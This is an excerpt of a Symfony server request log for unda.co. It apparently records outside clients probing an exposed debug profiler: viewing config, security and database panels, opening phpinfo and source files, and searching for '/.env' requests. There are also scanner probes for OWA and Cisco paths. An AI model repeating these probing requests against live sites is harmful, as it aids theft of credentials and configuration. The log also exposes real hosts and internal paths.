  4616. [2025-12-18 23:36:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c03d3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c03d3?panel=config","method":"GET"} []
  4617. [2025-12-18 23:36:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4618. [2025-12-18 23:40:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=config","method":"GET"} []
  4619. [2025-12-18 23:40:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4620. [2025-12-18 23:41:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=twig","method":"GET"} []
  4621. [2025-12-18 23:41:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4622. [2025-12-18 23:42:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=dump","method":"GET"} []
  4623. [2025-12-18 23:42:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4624. [2025-12-18 23:47:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4625. [2025-12-18 23:48:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7?panel=cache","method":"GET"} []
  4626. [2025-12-18 23:48:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4627. [2025-12-18 23:51:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=cache","method":"GET"} []
  4628. [2025-12-18 23:51:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4629. [2025-12-18 23:54:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4630. [2025-12-18 23:55:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9e546f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9e546f?panel=router","method":"GET"} []
  4631. [2025-12-18 23:55:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4632. [2025-12-18 23:55:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
  4633. [2025-12-18 23:55:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4634. [2025-12-18 23:56:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb0da7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fb0da7","method":"GET"} []
  4635. [2025-12-18 23:56:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4636. [2025-12-18 23:56:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=validator","method":"GET"} []
  4637. [2025-12-18 23:56:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  4638. [2025-12-18 23:58:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=router","method":"GET"} []
  4639. [2025-12-18 23:58:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4640. [2025-12-18 23:58:15] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"342871","_route":"_profiler_router"},"request_uri":"https://unda.co/_profiler/342871/router","method":"GET"} []
  4641. [2025-12-19 00:02:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"567cce","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/567cce?panel=security","method":"GET"} []
  4642. [2025-12-19 00:02:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4643. [2025-12-19 00:02:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=time","method":"GET"} []
  4644. [2025-12-19 00:02:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4645. [2025-12-19 00:04:20] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://web.unda.co/_profiler/open?file=src%2FHona%2FWebBundle%2FController%2FDefaultController.php&line=14","method":"GET"} []
  4646. [2025-12-19 00:05:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4647. [2025-12-19 00:07:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=config","method":"GET"} []
  4648. [2025-12-19 00:07:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4649. [2025-12-19 00:09:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=db","method":"GET"} []
  4650. [2025-12-19 00:09:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  4651. [2025-12-19 00:11:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /atom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /atom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4652. [2025-12-19 00:11:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"13da49","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/13da49/search/results?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  4653. [2025-12-19 00:11:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  4654. [2025-12-19 00:12:30] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  4655. [2025-12-19 00:13:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=swiftmailer","method":"GET"} []
  4656. [2025-12-19 00:13:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  4657. [2025-12-19 00:14:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4658. [2025-12-19 00:16:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /owa/auth/logon.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /owa/auth/logon.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4659. [2025-12-19 00:16:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"956458","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/956458?panel=router","method":"GET"} []
  4660. [2025-12-19 00:16:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4661. [2025-12-19 00:19:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4662. [2025-12-19 00:19:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4663. [2025-12-19 00:20:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=security","method":"GET"} []
  4664. [2025-12-19 00:20:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4665. [2025-12-19 00:20:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=events","method":"GET"} []
  4666. [2025-12-19 00:20:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  4667. [2025-12-19 00:23:17] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6aaa35","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6aaa35/search/results?ip=207.180.196.165&limit=10&url=https%3A%2F%2Fweb.unda.co%2F.env","method":"GET"} []
  4668. [2025-12-19 00:23:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&url=https%3A%2F%2Fweb.unda.co%2F.env","method":"GET"} []
  4669. [2025-12-19 00:23:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=router","method":"GET"} []
  4670. [2025-12-19 00:23:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4671. [2025-12-19 00:23:51] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"342871","_route":"_profiler_router"},"request_uri":"https://unda.co/_profiler/342871/router","method":"GET"} []
  4672. [2025-12-19 00:26:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5d1a9f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5d1a9f","method":"GET"} []
  4673. [2025-12-19 00:26:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4674. [2025-12-19 00:28:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=cache","method":"GET"} []
  4675. [2025-12-19 00:28:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4676. [2025-12-19 00:28:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1bacb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a1bacb?panel=time","method":"GET"} []
  4677. [2025-12-19 00:28:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4678. [2025-12-19 00:28:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"44e4df","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/44e4df?panel=form","method":"GET"} []
  4679. [2025-12-19 00:28:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4680. [2025-12-19 00:29:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4681. [2025-12-19 00:32:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=dump","method":"GET"} []
  4682. [2025-12-19 00:32:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4683. [2025-12-19 00:34:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=request","method":"GET"} []
  4684. [2025-12-19 00:34:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4685. [2025-12-19 00:35:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7c6e2f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7c6e2f?panel=request","method":"GET"} []
  4686. [2025-12-19 00:35:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4687. [2025-12-19 00:39:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content/uploads"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content/uploads\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4688. [2025-12-19 00:39:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  4689. [2025-12-19 00:39:39] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"8588e3","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/8588e3","method":"GET"} []
  4690. [2025-12-19 00:41:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4691. [2025-12-19 00:41:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4692. [2025-12-19 00:42:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap_index.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap_index.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4693. [2025-12-19 00:42:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6b3947","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6b3947?panel=events","method":"GET"} []
  4694. [2025-12-19 00:42:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  4695. [2025-12-19 00:43:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"02584c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/02584c?panel=security","method":"GET"} []
  4696. [2025-12-19 00:43:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4697. [2025-12-19 00:45:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=twig","method":"GET"} []
  4698. [2025-12-19 00:45:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4699. [2025-12-19 00:50:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=request","method":"GET"} []
  4700. [2025-12-19 00:50:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4701. [2025-12-19 00:56:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"342871","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/342871?panel=validator","method":"GET"} []
  4702. [2025-12-19 00:56:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  4703. [2025-12-19 00:58:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=config","method":"GET"} []
  4704. [2025-12-19 00:58:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4705. [2025-12-19 01:03:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7bd251","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7bd251","method":"GET"} []
  4706. [2025-12-19 01:03:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4707. [2025-12-19 01:06:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"884d3f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/884d3f?panel=cache","method":"GET"} []
  4708. [2025-12-19 01:06:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
